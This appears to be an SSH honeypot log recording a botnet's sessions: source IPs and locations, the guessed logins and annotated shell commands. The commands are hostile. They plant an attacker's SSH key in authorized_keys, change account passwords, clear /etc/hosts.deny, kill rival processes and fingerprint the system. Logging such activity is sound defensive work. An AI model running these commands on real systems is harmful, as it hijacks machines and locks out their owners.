$ echo "123\nqzKdLV4pOD0S\nqzKdLV4pOD0S\n"|passwd
$ echo -e "mobile\nciFFmZa9yndr\nciFFmZa9yndr"|passwd|bash
$ echo "mobile\nciFFmZa9yndr\nciFFmZa9yndr\n"|passwd
$ echo "root:MIML44ziZG0P"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 ghost_root_46 (165.154.60.76) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-06-06 14:12 EDT Β· as root/Pakistan@123, root/welcome2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:DlfpiSvFeogh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:n06kEe3cz1nM"|chpasswd|bash
🎭 ghost_root_47 (43.133.148.170) β€” Jakarta, Indonesia Β· 2 sessions Β· 38 cmds
2026-06-06 14:14 EDT Β· as root/Pakistan@123, root/welcome2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:erpoS3qXNKFd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ueMCYBskRiTI"|chpasswd|bash
🎭 capoeira_root_4 (45.4.179.3) β€” Igaci, Brazil Β· 1 session Β· 20 cmds
2026-06-06 12:58 EDT Β· as ljj/ljj
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ljj\nYCZUbQbNyNKF\nYCZUbQbNyNKF"|passwd|bash
$ Enter new UNIX password:
$ echo "ljj\nYCZUbQbNyNKF\nYCZUbQbNyNKF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 outback_pi (113.20.0.58) β€” Fortitude Valley, Australia Β· 1 session Β· 20 cmds
2026-06-06 12:58 EDT Β· as whitelabel/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nmUbEZbUGySqo\nmUbEZbUGySqo"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nmUbEZbUGySqo\nmUbEZbUGySqo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_32 (118.194.252.168) β€” Taipei, Taiwan Β· 1 session Β· 19 cmds
2026-06-06 12:22 EDT Β· as root/Zc123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:AdUoHCfIyFFT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_18 (95.58.255.251) β€” Astana, Kazakhstan Β· 3 sessions Β· 41 cmds
2026-05-15 15:47 EDT Β· as es1/es1, linux/linux123, root/Admin-123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:XYufizOX3Cbp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "es1\nnzO0o4Xn506c\nnzO0o4Xn506c"|passwd|bash
$ Enter new UNIX password:
$ echo "es1\nnzO0o4Xn506c\nnzO0o4Xn506c\n"|passwd
🎭 ghost_root_6 (185.239.85.154) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 60 cmds
2026-06-03 12:19 EDT Β· as admin/Password@123, cacti/123, minecraft/P@ssw0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Password@123\nlYbInWnOUkXV\nlYbInWnOUkXV"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "Password@123\nlYbInWnOUkXV\nlYbInWnOUkXV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "P@ssw0rd\n2uzSjurAO6Bs\n2uzSjurAO6Bs"|passwd|bash
$ echo "P@ssw0rd\n2uzSjurAO6Bs\n2uzSjurAO6Bs\n"|passwd
$ echo -e "123\nADmTXAOl6TTV\nADmTXAOl6TTV"|passwd|bash
$ echo "123\nADmTXAOl6TTV\nADmTXAOl6TTV\n"|passwd
🎭 specter_root_33 (43.129.33.244) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-06-06 11:20 EDT Β· as admin/Password@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Password@123\nsXYCNSXYLFy7\nsXYCNSXYLFy7"|passwd|bash
$ Enter new UNIX password:
$ echo "Password@123\nsXYCNSXYLFy7\nsXYCNSXYLFy7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_2 (222.108.147.76) β€” Gwangmyeong, South Korea Β· 1 session Β· 20 cmds
2026-06-06 11:09 EDT Β· as luis/luis123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "luis123\nKQo41ZUWszYA\nKQo41ZUWszYA"|passwd|bash
$ Enter new UNIX password:
$ echo "luis123\nKQo41ZUWszYA\nKQo41ZUWszYA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_18 (192.3.218.12) β€” Buffalo, United States Β· 1 session Β· 19 cmds
2026-06-06 11:03 EDT Β· as root/Admin-123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:4qn8ugFe5k4e"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_18 (23.94.136.36) β€” Elk Grove Village, United States Β· 1 session Β· 19 cmds
2026-06-06 10:40 EDT Β· as root/123qwezxc
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7fuCHZ2TKP9S"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 sakura_root (207.56.229.243) β€” Tokyo, Japan Β· 1 session Β· 19 cmds
2026-06-06 09:52 EDT Β· as root/00001111
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:PAlhRFi9rxnS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_5 (203.83.231.93) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-06-06 09:50 EDT Β· as ftpuser/Ftpuser1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Ftpuser1\n8gn0CsGisd0c\n8gn0CsGisd0c"|passwd|bash
$ Enter new UNIX password:
$ echo "Ftpuser1\n8gn0CsGisd0c\n8gn0CsGisd0c\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_48 (57.128.225.99) β€” Warsaw, Poland Β· 1 session Β· 20 cmds
2026-06-06 08:40 EDT Β· as user2/qwerty
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qwerty\npBwpxtdIbzSV\npBwpxtdIbzSV"|passwd|bash
$ Enter new UNIX password:
$ echo "qwerty\npBwpxtdIbzSV\npBwpxtdIbzSV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
